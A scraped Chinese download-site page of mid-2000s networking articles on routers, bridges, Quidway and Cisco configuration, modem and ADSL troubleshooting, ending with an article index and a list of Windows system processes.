      上篇文章：TCP/IP子网掩码教程
      下篇文章：防御DDoS攻击的11种方法

      ∷相关文章∷∷热门文章∷
      · 比尔．盖茨哭了——微软全部序列号
      · 计算机启动更快的十五招
      · 解决XP局域网访问问题
      · DBVR中文版详细图文攻略
      · Windows XP超级技巧十六招

         关于本站 下载声明 下载帮助
      CopyRight&copy; 2005河套下载&#8482; All Rights Reserved
      本站使用中国网通巴彦淖尔分公司河套信息港优质服务器及带宽 供巴彦淖尔网通用户使用


网桥与路由器的区别

《一键清理系统垃圾》

网桥与路由器的区别

    网桥是一个简单的相关设备。它唯一的目的是把被许多正在共享的物理网络分割成多个小部分。网桥通常只有2个端口；超过2个端口的网桥称为switch。

    因为以太网是最常用的物理网络，我们将用它来说明我们的观点。在一个以太网上，所有的接入计算机都共享同一根“线”（物理上不是同一根，但是电气相通的）。当2台计算机试图在同一时间内对话，他们将会被对方淹没，这就叫冲突。在以太网上的计算机越多，冲突的机会就越大。

    网桥把以太网分割成许多冲突域。除非网桥另一边的计算机预定，否则在网桥1边的所有数据都留在那里，这样全面减少了1段上的负担。

    网桥不考虑用户在网上使用的协议（TCP/IP，IPX，AppleTalk，ect。），因为它们是在数据链路层工作。这既是一个优点，同时也是一个缺点；因为它们工作在一个简单的层上，网桥可以盲目的以高速操作，但是它们会不加选择的传输数据，我们几乎不能对它的工作进行控制。从此路由器就诞生了。

    路由器工作在网络层——他们事实上知道在网络上传输数据的协议。正因为它们知道协议，所以他们能按规则来决定将怎样处理特定的数据。

    为此，路由器在为不同目的或不同组织的连接网络是很有用的。用户可以申请规则或过滤器来使特定的数据通过，而不使其他的数据不通过。或者安排为某种目的服务的数据进入特定的网络连接，其他的数据跳过这连接。

    这种服务是要收费的。路由器得到特定数据的描述月详细，数据发送到目的地的延时越长。所以，快速路由器的培植越高，硬件的价格越贵。

    总之，在现今的大多数大型网络里，你可以找到一种switch（以多端口网桥为基础）和路由器的混合物。同拥有他们的优点和缺点-但他们的组合是1个有效的组合。

返回


为中小网络设计的Cisco1720访问路由器

《一键清理系统垃圾》

为中小网络设计的Cisco1720访问路由器

    名称：Cisco1720访问路由器

    供应商：Cisco公司

    适用范围：中小企业远程访问

    特点： VPN接入功能、具有很高的集成性，较高的性能价格比

    Cisco1720路由器是Cisco公司推向市场不久的新产品，它是一款能满足中小企业远程访问需求的模块化路由器产品。Cisco1720访问路由器的功能强大，应用范围广阔，而价格则相对低廉，被誉为理想产品， Cisco1720访问路由器采用高性能加密功能的RISC处理器，提供一个10/100M自适应的快速以太网端口、一个控制台端口、两个广域网网卡插槽、一个辅助（AUX）端口，还有一个支持未来硬件辅助服务的内部扩展插槽。Cisco1720路由器与Cisco的其他路由器产品一样，支持多种广域网技术，如DDN、ISDN、X.25、帧中继等。其中的WIC-2A/S广域网网卡具有2个同步/异步串行接口（同步速度高达128Kbps）。

    Cisco1720路由器除了能实现经典路由器的数据传送功能以外，还能实现VPN网络功能，其专为加密算法进行优化设计的RISC CPU可以在提供高效的数据加密的同时而不会降低网络性能。Cisco1720能够为一个中小企业和分支机构网络作好未来的准备，它具备三个关键特征：VPN接入功能、适应不断变化之要求的灵活性、多种网络功能的集成。Cisco1720路由器的可互换的广域网网卡能够实现广域网技术的简单更新或升级，从而跟上办公需求。Cisco1720路由器在一个单一产品中提供一个全面的访问解决方案，可以将路由器、DSU/CSU、ISDN NT1以及防火墙、VPN Channel服务器及加密功能的选项紧密地结合起来。这种集成减少了部署和管理时间及开销，节省了空间，并且提高了可靠性。

返回


新地址路由迷路记

《一键清理系统垃圾》

新地址路由迷路记

新任务调来了新地址
    前段时间，总行统一部署部分新业务，使用了新的IP地址，支行分到的内部地址空间为11.84.107.0～11.84.107.127，互联端口地址为11.84.205.2；上级行内部地址空间为11．84．193．0～11.84.193.255，互联端口地址为11.84.205.1。原业务使用的老地址照常使用。
    接到通知后，我们在路由器上增加了新地址的配置。
    int s0
    #ip route 11.84.193.0 255.255.255.0 10.99.254.46
    #int s0.1
    #ip address 11.84.205.2 255.255.255.0
    #x25 map ip 11.84.205.1 48016320
    #int e0
    #ip address 11.84.107.10 255.255.255.128 secondary
    最后在网管员的PC工作站上Ping通上级行的新地址服务器，说明路由配置正确，新业务的网络准备工作告一段落。
    新地址使路由迷了路
    第一次迷路源自数字上的小差错
    新业务用机使用Windows98操作系统，IP地址按新范围设置为11.84.107.111，网关地址设为11.84.107.10和10.99.78.10。设置完毕后，Ping本行路由,通；Ping本行其他机器，通；Ping上级行服务器11.64.193.1,不通！
    这就怪了，难道路由配置有错？我们试着将机器地址改为原来的老地址范围：10.99.78.111，再Ping上级行服务器，竟然通了，看来只能怀疑路由器的设置了，可是仔细检查路由器的设置，还是没有发现问题。
    没办法，只好请示上级行的网管员，一查，原来是上级行在新配路由器参数时，把我们地址中的一位数字设错了。
    第二次迷路因为地址范围上的疏忽
    这次业务用机是HP VL400，机器主板上集成了3Com 905C网卡，安装的操作系统是SCO OpenServer 5.0.5。按以往的习惯，IP地址我们设为11.84.107.141，子网掩码设为255.255.255.0。
    这次遇到的问题是Ping其他机器一律不通。Ping自身通，说明网卡安装正确。
    我们换用一根正在正常使用的网线，却仍然不通。机器是新的，网卡是集成在主板上的，坏的可能性不大，况且也不可能更换，前几天试验的时候也能和其他机器连通，看来还是只能从网络设置上下手。 　　于是我们将IP地址改为老范围：10.99.78.141，Ping其他机器,通了，证明确实是设置的问题，难道还是路由器设置有问题吗？
    没办法只好再请上级行的网管员帮助，经查，没有发现什么问题，又远程检查了我们的路由器设置后也没有发现问题，真奇怪！再仔细对照安装手册，检查UNIX中的网卡设置，还是没发现问题！
    冥思苦想之中，我们决定再次检查路由器的设置，于是注意到下面一条中的子网掩码不是常用的255.255.255.0：
    #ip address 11.84.107.10 255.255.255.128 secondary
    猛然间我们想起新地址空间为11.84.107.0～11.84.107.127，而我们给机器配的IP地址为11.84.107.141，超出了此范围，问题总算找到了。我们马上将地址改为：11.84.107.72，重启机器后，再Ping其他机器，一切OK。
    背景资料
    我们支行局域网原使用10.99．78．0网段地址，对外互联端口IP地址为10.99.254.141,经路由器、调制解调器通过X.25专线与上级行和兄弟行互联，X.25端口地址为48016312，所有机器网络配置中的子网掩码一律为255.255.255.0，路由器地址为10.99.78.10，网管员用的PC工作站的IP地址为10.99.78.51，其他PC工作站的IP地址为10.99.78.111～10.99.78.181；上级行局域网使用10.99．209．0网段地址，对外互联端口IP地址为10.99.254.46, X.25端口地址为48016320（如图所示）。

    心得体会
    在网络设置、维护工作中，出现网络不通的故障是比较常见的，无论是网线、网卡、集线器等硬件出问题，还是路由器参数设置、各机器网络参数设置等出问题，都可能造成网络不通。硬件问题可以通过替换、比较的方法排除，相对较容易；而软件方面的参数设置由于涉及面多，隐蔽性强，较难查找。这就需要耐心、细致，仔细对照相关资料、参数，必要的时候多和相关部门联系，协同作战，才能少走弯路，尽快从迷途中返回。

返回


一例由“猫”引起的显卡故障

《一键清理系统垃圾》

一例由“猫”引起的显卡故障

    最近，我从朋友处新买了一只朗润科技的先行者56K内置猫。回到家后，我便打开机箱，按说明书要求的步骤，给这只猫在机箱里安了个家。接下来当然又是一番设置，随后我便驾上小猫直奔互联网而去。

    上得网来，浏览各个网站，感觉速度很快。我一看竟有53K连接速率，而且还很稳定，心中正要高兴，忽然原本漂亮的屏幕，一下子变成了一张“麻婆脸”，出现了严重的花屏现象。

    看着这“色彩斑斓”的显示画面，我的第一反应是：我的ACER57C显示器出问题了！我忙对它进行了一番调整：消磁、调整刷新频率、色彩……一一试过，可一点也没用。没法，作为菜鸟的我只能重新开机，可当我又一次启动机器后，发现一切正常，毫无花屏现象。以防万一我又玩了近两小时的游戏，还是如此，我一阵窃喜，原来是虚惊一场。于是我又一次驱猫上网，可不久花屏现象就又出现了！！！

    这是为什么？开机这么长时间，显示器显示的图像都正常，说明我的显示器和S3显卡都应该是没有问题的。可是只要上网，不久就会……，难道是这只小猫的问题？！哎，死马当作活马医，试试看。我花了N分钟小心翼翼地把我的这只小猫重装了一遍，可一上网，结果还是花屏没商量。

     My God，难道我就真的不能上网了吗！无奈之下，我拔下显卡，仔细地研究了一番，没有发现。于是我又随手把显卡插进插槽，开机上网想再试一次，或许会有奇迹发生。奇迹真的发生了，这次我一连上了三个小时的网，竟没花屏。

    问题解决了，兴奋之余，我也很纳闷其中的原因，就又打开机箱，这时我才发现，刚才我把显卡从原来靠近猫的那根插槽移到了另一根离猫较远的插槽中。我把显卡插回原处，故障又出现了。这时我明白了，原来我的这只小猫工作时会在周围产生一个电磁场，原先我的显卡离猫太近，受到磁场干扰产生花屏，后来把它从小猫身边移开，就不再受其干扰，也就不会再产生花屏了。想到这里，我急忙把显卡拔出，插入了离猫较远的那根插槽中，果然一切又正常了，我总算又可以上网了。 这次小小的故障给我的教训是：机箱内的各种板卡都应合理安排，避免板卡间应彼此的电磁干扰而产生故障。


用Windows 2000 Server作路由器

《一键清理系统垃圾》

用Windows 2000 Server作路由器

    在TCP／IP网络互联中，不同网络的互联往往要使用到路由器。基于硬件的路由器价格往往较高，不为一般的单位所接受，而且在联网过程中，常碰到的问题都是将两个或两个以的局域网互联。实际上，有好多网络操作系统本身就提供路由功能，只不过是基于软件的路由而已，如Windows 2000 Server的静态路由系统就是基于软件的路由技术。
    在TCP／IP协议中，IP协议（Internet Protocol）提供编址和路由功能。在网络上发送数据时，数据首先被打包，成为一个个IP数据包。IP允许数据包在网络上从一个地方传到另一个地方。在一个以太网内，把报文从一台机器发送到另一台机器很容易，因为在同一网络内部，每一个报文无须选择路径，就可以直接达到它的目的地。但是，在两个或两个以上的网络互联时，情况就大不一样了。如^47050402a^1所示，处在网络A中的某一台机器要向处在网络B中的一台机器发送信息时，如果没有设置网络A到网络B的路由，则信息是根本无法发送出去的。
    在Windows 2000 Server中，IP路由是IP具有的功能。它允许将一台机器配制成多宿主机。也即在同一台计算机上，同时安装两块或多块网卡，每一块网卡连接一个网络。由这一台机器作为路由器，在两个网络之间进行IP包的路由。此路由为静态路由，静态路由器要求手工构造和更新路由表。
    在各网络已建成的情况下，建立Windows 2000 Server路由器，其建立过程如下：
    1.在一台Windows 2000 Server机器中安装两块网卡。
    2.进入控制面板，在网络和拨号连接中选择两个LAN连接的属性添加TCP／IP协议。
    3.配置网卡：为每一块网卡配置一个IP地址，两个IP地址分别属于不同的网络内的IP地址。并设置每块网卡的网关地址。
    4.通过Windows 2000 Server管理工具中的路由管理来设置启用IP路由管理功能和启用路由器发布功能。注意：必须在两个LAN连接中同时启用。
    5.在客户端上只需将缺省路由设置为与之在同一网段上的路由器网卡IP地址。
    这样，Windows 2000路由器就可以在两网络间进行工作了。
    以上是将Windows 2000 Server 路由器运用在两个网络之间，它可以很好地胜任它的任务，但是如果有三个或三个以上的网络，上面所提到的方法就不能胜任了。
    请看如^47050402b^2的网络结构：
    路由器1只能把消息从网络A传到网络B但不能将信息从网络A传至网络C。不过不要紧，Windows 2000中的Route命令可以告诉路由器如何到达C。对路由器1及路由器2来说，它们都同时属于B这一网络，因此要使路由器能够通过A网络发到C网络，只要告诉路由器1网络A中路由器2的网卡地址即可。
    命令格式如下：
    route add A的网络IP地址 路由器2的IP地址（如 route add 192.9200 220.220.110.1）
    这一命令将向路由器1的路由表中添加路由信息，其意为：把任何目的为192.9.200.xxx的IP包发到220.220.110.1上。
    同样，对于网络C，路由器2也不知道如何到达A网络，也要告诉它如何到达。
    命令格式同上。
    另外，可以Windows 2000 Server管理工具中的路由管理来通过Windows窗口方式设置：打开路由管理，在静态路由中添加以上静态路由即可。
    如果不用静态路由来配置，还可采用RIP路由信息协议简化路由信息的交换，一个RIP路由器就是一个连接在网上广播路由信息和指示报文转发途径的硬件。由于Windows 2000 Server支持RIP动态地管理互联协议路由信息表，因此可以通过它来自动更新路由信息表，减轻系统维护的工作量，只不过它增加：打开路由管理，通过右键选择添加新协议，选中RIP即可。再选中RIP通过右键添加新接口（如图2中，在路由器1、2中添加的新接口为与网络B连接的网卡）。
    至此，服务器的路由设置完成。


用实达路由器组建金融骨干网

《一键清理系统垃圾》

用实达路由器组建金融骨干网

   中国金融行业在国民经济与人民生活中处于重要地位，在电子技术的推动下，无论在技术上、竞争上还是在客户上经营环境都发生了质变，直接带来了整个金融行业的信息化革命。实达公司看到了这一需要，推出了一系列适合金融系统的产品与解决方案，在四川雅安金融网络建设中取得了成功。
    ■ 用户环境
    四川雅安金融网络属于全国性的中国金融数据通信骨干网（以下简称金融网），为适应业务发展需要, 将建成以总行为中心网站、链接其下属17个分支储蓄所的广域网。雅安地区人行中心支行及辖内4家县级人行支行、5家国有商业银行与8个县级金融机构使用帧中继业务接入金融网。

    雅安市人民银行作为全市银行的业务处理和管理中心，既要保证雅安市人民银行自身局域网建设的安全性、合理性与可管理性，又要考虑银行之间的互联、合作伙伴的连接、用户的接入，这样其网络的构建与设备的选型需要满足传输速率、通信量、保密性、可扩展性以及低成本等多方面的要求，对产品提供商是一个巨大的挑战。通过竞标，实达网络公司的方案最终赢得了用户。
    ■ 方案设计
    此次金融网的构建，出于技术和成本的考虑，中心节点的交换机选用Cisco4000，主体路由器设备选用实达网络公司Star-R2501路由器，分支节点选用达克NTU558基带Modem设备，整体网络的建设由实达网络公司和西南交大三特高新技术开发公司共同来完成。

    其设计如下：

    在中国人民银行成都分行以1条128k市内DDN电路接入金融网的基础上，人民银行雅安中支以64k市内DDN电路接入金融网并开通1条CIR（承诺信息速率）为16k的PVC与成都分行相连，各县人行支行分别以64k本地营业区间DDN接入金融网，开通8k市内PVC与当地中心支行相连，构成人行内联网。根据人民银行信贷登记咨询系统建设的要求，雅安人行中支另开一条64kDDN端口，辖内各商业银行以及城市信用社和农村信用社开通64kDDN端口，以16kPVC与人民银行连接。各入网机构自备Modem,其型号为DT128。Modem提供给用户的物理接口为V.35，接口协议为帧中继UNI/DCE。（DDN及PVC分配见表1）

表1
金融网组网单位
ddn性质
pvc性质

人行成都分行
128k本地

雅安人行中央支行
64k本地
16k省内至成都分行

辖内各人行县支行
64k区间
8k本地至中支

商业银行及城乡信用社
64k本地
16k至当地人行

    人行中央支行及县支行路由器等网络设备由人行雅安地区中支科技科统一配置调试；国有商业银行根据雅安人行下发的IP地址分配方案自行调试联网；对于17家城市、农村信用社，由于路由设备相同，配置也都基本相同，只是具体IP地址、子网掩码不同，工程具体实施由实达网络公司、西南交大三特高新技术开发公司、及雅安人民银行科技科协同完成。
    ■ 运行效果分析
    雅安地区人民银行金融网从建成至今运行稳定，而实达网络公司的产品由于在该网络的主体构建中取代了Cisco等国外品牌，因此其运行效果受到更多的关注。Star-R2501路由器凭借其稳定的运行性能、快速的响应、丰富的协议、先进的管理功能充分满足了金融网的各项需求，得到了银行内部的一致认同。而其相对国外品牌在价格上的绝对优势，为整个金融网的构建节约了大量的成本。

    雅安市金融网络的建立和完善，直接提高了雅安市人民银行内部以及各银行之间的信息管理水平，无论是业务数据的再加工，还是决策分析的支持、办公的自动化，都将因此登上一个新的台阶。

返回


用微波组建城域网

《一键清理系统垃圾》

用微波组建城域网

    随着计算机应用的迅速普及，资源共享的要求越来越高，为此，我们决定，把远离局本部的刘村变电所（我们简称“刘村变”）局域网与局本部局域网互连。组建城域网，利用光纤通道或无线扩频技术都是比较理想的选择，但是，这两种方案投资都比较高，短时间内难以实现，所以，我们决定利用现有的通信资源一点多址设备提供的数字通道，把刘村变微机网络连入局本部局域网，组建供电局的城域网。

    背景介绍

    我局运行的一点多址设备是加拿大SR通信设备公司的SR550-s系统，是点对多点时分多址（PMP-TDMA）用户无线系统，配备的同步数据板提供了RS232（V.24）、RS422（V.11、V.35）、G.703三种接口。我们在局本部和远端刘村变各配置了一台Quidway R2501路由器，它具有2个多协议同/异步串口、1个备份口，2个同/异步串口可接高速同步线路，连接远程局域网和分支机构，也可以通过异步拨号实现局域网互连。我们利用一点多址设备提供的2条64k数字通道，通过负载均衡技术实现局本部局域网与刘村变局域网128k速率的连接，配置AUX口作为备份连接方式，一旦微波数字通道出故障，可以启动拨号实现备份功能，其接线方式如图所示。

    完成基本设备配置

    ●微波数字通道配置

    我们在广域网连接时采用EIA/TIA-232 DTE通信方式，微波数字通道要作相应的配置（包括中心侧和刘村变侧）。拨动通道版上的DIP开关，把波特率设定为64k，通讯模式设定为RS-232，并且通过软件，把要使用的两路数字通道设为专线方式。

    ●Quidway R2501路由器配置

    配置Quidway R2501有两种方法，一是通过Quidway R2501的配置端口,利用微机或终端来配置，二是利用网络通过Telnet命令来配置，不过采用第二种方法，要求用户已经正确配置了路由器各接口的IP地址。第一种方法更具有通用性，其配置方法如下：

    第一步：准备一台安装了Win95/98操作系统的个人PC；

    第二步：用随机提供的配置口电缆把PC的串口1和Quidway R2501的Console口相连，然后打开PC和Quidway R2501的电源。

    第三步：用PC建一个超级终端。开始→程序→附件→通信→超级终端。用鼠标双击Hypertrm.exe文件，然后输入要建的超级终端名称并选择一个图标，选择“直接连接到串口1”选项，设置通信端口（设置终端通信参数：通信速率9600bps、8位数据位、1位停止位，无奇偶校验，无流控，终端类型：VT100，二进制传输协议：Xmodem/CRC.），鼠标点击确定后，PC终端即正确连到了Quidway R2501路由器上。

    ●工作站配置

    为了实现两个局域网内微机的通信，要求工作站也要作相应的配置：局本部局域网工作站的默认网关设为10.138.184.21，刘村变局域网工作站的默认网关设为10.138.185.193，这样，两个局域网内的微机就可互相通信了。

    设置双方局域网互连

    我们以局本部Quidway R2501路由器配置为例，说明怎样设置实现双方局域网互连的路由（我们已在SETUP模式中设定了Quidway R2501路由器的主机名为：Quidway）。

    局本部的局域网为：10.138.184.0（子网掩码：255.255.255.0），路由器的局域网端口地址：10.138.184.21，远端刘村变的局域网为：10.138.185.192（子网掩码：255.255.255.192），路由器的局域网端口地址：10.138.185.193。）：

    进入特权模式：enable，输入口令；

    进入配置模式：config，配置以太网口的IP 地址为10.138.184.21：Quidway(Config-if-Ethernet0)#ip address 10.138.184.21 255.255.255.0，配置serial 0的IP 地址10.139.184.245：Quidway(Config-if-Serial0)#ip address 10.139.184.245 255.255.255.252

    注：远端刘村变Quidway R2501路由器serial 0端口的IP地址：10.139.184.246 255.255.255.252。

    配置serial 1的IP 地址10.139.184.249：

    Quidway(Config-if-Serial1)#ip address 10.139.184.249 255.255.255.252

    注：远端刘村变Quidway R2501路由器serial 1端口的IP地址：10.139.184.250 255.255.255.252。

    配置AUX的IP 地址10.139.184.253：

    Quidway(Config-if-Serial2)#ip address 10.139.184.253 255.255.255.252

    注：远端刘村变Quidway R2501路由器AUX端口的IP地址：10.139.184.254 255.255.255.252。

    配置2条静态路由(为了实现负荷均衡，serial0和serial1的优先级相同)：

    ip route 10.138.185.192 255.255.255.192 10.139.184.246

    ip route 10.138.185.192 255.255.255.192 10.139.184.250

    配置备份口的静态路由，优先级比主口低，为80：

    ip route 10.138.185.192 255.255.255.192 10.139.184.254 preference 80

    配置备份口的拨号：

    进入备份口配置模式：

    Quidway(Config)#interface serial 2

    链路层封装协议配置为PPP：

    Quidway(Config-if-Serial2)#encapsulation ppp

    设置备份口的波特率：

    Quidway(Config-if-Serial2)#baudrate 19200

    允许Modem呼出和呼入：

    Quidway(Config-if-Serial2)#modem

    使能DDR：

    Quidway(Config-if-Serial2)#dialer in-band

    指明接口使用dialer-list 1：

    Quidway(Config-if-Serial2)#dialer-group 1

    配置IP地址和电话号码的映射关系：

    dialer map ip 10.139.184.253(刘村变的IP地址) 2884271(要拔的电话号码)

    配置修改结束后，一定要执行write命令，否则，系统重启后所作的修改就全部丢失了。

    远端刘村变的Quidway R2501路由器进行类似的配置，配置完毕，就可投入使用了。

    运行结果怎么样

    该项目自７月初正式投运以来，运行稳定、可靠，基本上达到了预期目标。电力系统内广泛使用了一点多址通信系统，在尚未建立城域网的单位，先期利用现有一点多址通信资源来组建单位内部的城域网，不失为一个很好的过渡方案。

返回


由ADSL电源引发的显示器故障

《一键清理系统垃圾》

由ADSL电源引发的显示器故障

《中国电脑教育报》望想

    我的“爱机”配置虽然不高（赛扬1.2GHz/Intel815EP主板/128MB SDRAM内存/40GB金钻硬盘/PHILIPS 107T显示器/GF2 MX400显卡），但主要用来上网和处理文字，我认为够用了。考虑到上网的时间比较长，为了保护眼睛，特意选了当时口碑较好的名牌显示器。可是没想到，刚用了两个多月问题就来了，每次开机，在显示器的右下角都出现上下跳动（其它位置没有问题），而且使用越久范围越大。

    为了确定问题所在，我将主机连接到另一台显示器上，却没出现任何现象，说明软件和主机箱都没问题。看来这应该是显示器的问题了，认真查阅了PHILIPS 107T的使用说明书，把各种可能的设置都试了，结果问题还是没解决。无奈之余，只好打电话通知经销商，他们派来一名技术人员，折腾了半天也没有解决，只得答应换台显示器。换了之后自然是没有问题，以为故障也就这么解决了。

    谁知第二天开机的时候，老毛病又出现了，开始只是在右下角轻微晃动，用久了和原来的一样，把显示器的刷新率调到各种模式问题还是不能解决。看来问题不是出在显示器上面，只剩下环境了。看看电脑桌，除了显示器还有音箱、一部电话机、一个插头和一个ADSL调制解调器。音箱据说是可防磁的，但以防万一，还是将它搬开试试，可故障依旧。接着又把电话、调制解调器拿开，还是老样子……最后只剩下电源接线板了，安装时为了方便把它放到桌面上，距显示器右后也不到10cm。接线板上面只插着ADSL电源，这个电源是带变压器的，忽然想到变压器也是具有磁化的能力，于是赶忙把它拿开。不到两分钟，显示器的跳动现象越来越小，直至消失。回想起来，原本以为匪夷所思的故障，竟然是由于一些小问题所引起的，通过这次故障的排除，使我懂得有些电脑的问题，不光是电脑本身的问题，还应该考虑到外部环境。

    叮当点评：虽然电脑已经是普及的“家电”，但它依旧很娇贵的呢！所以，对它细心的照料是必不可少的。


再谈在Win 2003和Win XP平台下的ADSL共享

《一键清理系统垃圾》

再谈在Win 2003和Win XP平台下的ADSL共享

  大家看到这个题目肯定以为是老生常谈。不过我们这次讨论的是基于“Windows Server 2003+Windows XP”所搭建的平台如何利用Windows自身提供的“Internet连接共享”功能实现ADSL共享上网。尽管在实现原理上与其他系统(Windows 2000、Windows 98)相同，但在具体操作上还是有一些区别的。

    添加网卡

    用来做“Internet连接共享”服务器的计算机应该安装两块网卡，一块与ADSL Modem连接，另一块与内网计算机或交换机相连。

    开启“Internet连接共享”

    假设服务器端使用的是Windows Server 2003。在“网络连接”对话框中右键点击ADSL连接图标，选择“属性”，打开“属性”对话框，然后进入“高级”选项卡，勾选“Internet连接共享”中的“允许其他网络用户通过此计算机的Internet连接来连接”选项。然后在“家庭网络连接”下拉列表中选中连接内网计算机或交换机的本地连接(本文为“本地连接2”)。其他选项保持默认设置，最后单击“确定”按钮。

    提示：启用“Internet连接共享”后，连接内网的“本地连接2”的IP地址将被系统自动设置为“192.168.0.1”。因此如果内网中其他计算机的IP地址不属于该网段，则通信可能会终止。建议将内网中的计算机设置为自动获取IP地址的模式。

    客户端共享上网

    以安装Windows XP的客户端为例，将IP地址设置为自动获取模式，无须指定网关即可实现共享上网。当然也可以将IP地址设为“192.168.0.2~192.168.0.255”当中的一个，网关指定为“192.168.0.1”即可。


在Windows 2000下安装内猫

《一键清理系统垃圾》

在Windows 2000下安装内猫

     我用的金网霸内猫型号为FM3621-2，ESS2898/2818，主板是硕泰克SL-65KVB（694X+686A芯片），BIOS版本为f7。电脑里原操作系统为WinMe，在此基础上安装Win2000作双启动。该内猫的驱动光盘里有2838.2818.2819三种芯片的驱动。在WinMe或Win98下，我用的是2819的驱动。系统识别为Ess56T PI Data Fax Voice Modem，另外，系统还识别一个HSP56 MR猫，估计是主板上的AMR接口作怪（可就是这个HSR56 MR的内猫害我大伤脑筋）。
        在安装完Win2000系统及主板驱动、显卡驱动后，这个金网霸却怎么也安装不上（从驱动之家下载来Ess2818 ForWin2000和Ess2819 ForWin2000的驱动）。系统总是提示找到一个“PCI简易通讯控制器”，然后指定安装硬件类型为调制解调器，再指定从磁盘安装，指定驱动所在目录。系统提示不兼容设备。先不理它，装上再说。完后，系统又自己找到一个“Es56 PCI Data Fax Modem”，又是一路“下一步”至完成。然后到设备管理器里一看，有两个ESS Modem，各带一个惊叹号。只好又卸载它们，重新安装。我试了2819.2818 For Win2000.For WinNT的驱动，连Win2000自带的驱动也试过了，还是不行。
        隔日，不经意地发现，我指定安装的那个Ess Modem占用COM3口，而系统自动安装的那个占用COM4口。忽然，脑中灵光一现，赶紧重启到WinME下一看，果然那个HSP56 MR占用的是 COM3口。难道主板上还集成了一个AMR猫。于是用这个HSR56 MR建立了一个新连接，一拨号，说端口已打开，调制解调器未安装。这回明白了，来到CMOS里，在Advance ChipSet Feature里找到OnChip modem将值由Auto改为Disable，再到Win2000里一看，Ess modem只剩一个了，惊叹号也没了，开机一试，工作正常。
        有了这次经历，我索性格式化了硬盘（安装Win2000那个分区），重新安装完Win2000和其他驱动。到安装那个“PCI简易通讯控制器”时，指定安装硬件为调制解调器，在选择设备厂商时，选择Ess Technology，找到ESS56T PL DATD FAX MODEM，并选择驱动程序厂商为Microsoft，别管它设备兼容不兼容，装上一看，调制解调器为Ess56T PI Data Fax Modem，占用了COM3口，试机正常，至此，这金网霸总算在Win2000下安了家。


自制护“猫”防雷装置

《一键清理系统垃圾》

自制护“猫”防雷装置

几天前因为马虎，上网后忘记拔掉电话线，我“养”了快两年的内猫竟被雷电给“劈死”了。不得已重新买了一个，这次我为它做了一个防雷装置，现介绍给大家：
    功能：在不工作的时候，自动断开连接“猫”的电话线，起防雷作用。
    材料：到电子商店购买12V继电器（大约5元～7元）和计算机内5V/12V电源延长线插头，电烙铁，万用表。
    制作过程：首先在适当位置剪断电话线，连接继电器（^21030504a^），注意方向一致。
    然后绕起或剪短不用的红/黑（5V）插头线，将黄/黑（12V）线分别焊接到继电器（正负极不分），如有Turbo开关，可以串联黄线或黑线，管理会更方便。
    最后把制作好的插头和计算机内电源连接上，再将继电器用包装盒套上.
    制作要领：在选择连接继电器电源时，也可用手头多余小变压器连接，在不上网时可调低电压起开关作用。但无论用何种电源，都要注意和继电器电压匹配，或用电阻、电阻调节器串联。
    好，祝大家成功！
    阿乐点评：内“猫”被雷击坏的例子多不胜数，要经常去插拔电话线，我等DIYer又会觉得麻烦。这个简单的护“猫”防雷装置制作简单，可以增强我们DIYer的动手能力。


网络设备故障

《一键清理系统垃圾》

返回总目录

网络设备故障

◎“猫”之加速终极篇
◎ADSL拨号中出现的错误代码
◎ADSL常见故障全接触
◎ADSL常见经典故障大全！
◎ADSL常见经典故障大全
◎ADSL防御黑客攻击的十大办法
◎拯救遭破坏的数据
◎ADSL上网常见问题集锦
◎Cisco防火墙技术汇总
◎Cisco交换机设置点滴
◎CISCO路由器口令恢复
◎Cisco路由器上如何防止DDoS
◎D-Link路由器DI-1162
◎IPv6技术素描
◎IP路由协议的配置实例
◎IP网络路由技术
◎Linux巧变PC为路由器
◎Modem
◎NT Server 4.0 做静态路由器
◎Quidway R2501路由器配置指南
◎Quidway R2630系列路由器
◎SCO XENIX Ver2.3.4中两个有用的DOS拷贝命令
◎TP-LINK内猫与PCI插槽的兼容性问题
◎VLAN中的VTP和STP
◎Windows NT服务器用作路由器
◎八大绝招查找和排除ADSL变慢原因
◎八大绝招查找和排除ADSL变慢原因
◎八种常见的ADSL断流现象
◎不能上网，只因电话欠费
◎部分ADSL猫的默认密码
◎畅游Internet用ISDN路由器
◎成电先锋路由器组建电力调度网
◎代理服务器的路由问题
◎电线——看不见的捣乱分子
◎调试路由器做中继代理的小插曲
◎高效交换路由器
◎骨干路由器技术展望
◎光网与分组网络牵手
◎华为路由器防火墙配置命令总结
◎华为路由器用在关键部门
◎为什么有的机器无法启动"路由与远程访问"服务?
◎基于Linux的路由器和防火墙配置
◎几种宽带骨干网模式
◎交换机命令全集
◎交换机详解
◎交换网络的路由技术
◎接入路由器的几种选择
◎结合实例讲解广域网路由基本技术
◎结合实例讲解广域网路由基本技术
◎看灯识ADSL故障排除四则
◎快速配置3COM NetBuilder RO224
◎宽带不能连通一例
◎宽带路由器常见故障巧排除
◎利用WINDOWS NT设置软件路由
◎路由
◎路由器 <二>
◎路由器 <三>
◎路由器 <四>
◎NOVELL局域网上WEB的建立
◎路由器 <一>
◎路由器的基本协议与技术
◎路由器的结构
◎路由器的类型
◎路由器的配置与调试
◎路由器的作用
◎路由器在IP网络中的位置
◎路由器基本知识
◎路由器基础知识（一）
◎路由器是什么
◎路由器与交换机的区别
◎路由器原理和路由协议、算法详解
◎猫”病诊断问答
◎内“猫”唤醒计算机
◎小小数据线，也惹大麻烦
◎驱动错误导致Modem罢工
◎如何解决拨号后掉线的问题
◎如何有效防止Modem掉线
◎实达路由器连起电信财务广域网
◎双ADSL负载均衡(ROS)
◎死“猫”复活记
◎痛苦的Modem维修记
◎网络中各种网线的接线的方法
◎网桥与路由器的区别
◎为中小网络设计的Cisco1720访问路由器
◎新地址路由迷路记
◎一例由“猫”引起的显卡故障
◎用Windows 2000 Server作路由器
◎用实达路由器组建金融骨干网
◎用微波组建城域网
◎由ADSL电源引发的显示器故障
◎再谈在Win 2003和Win XP平台下的ADSL共享
◎在Windows 2000下安装内猫
◎自制护“猫”防雷装置
◎走马观花看路由

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


2K服务详解

《一键清理系统垃圾》

返回总目录 目录页 下一页

2K服务详解

svchost.exe 文件对那些从动态链接库中运行的服务来说是一个普通的主机进程名；最基本的系统进程（也就是说，这些进程是系统运行的基本条件，有了这些进程，系统就能正常运行）:
smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务)
产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
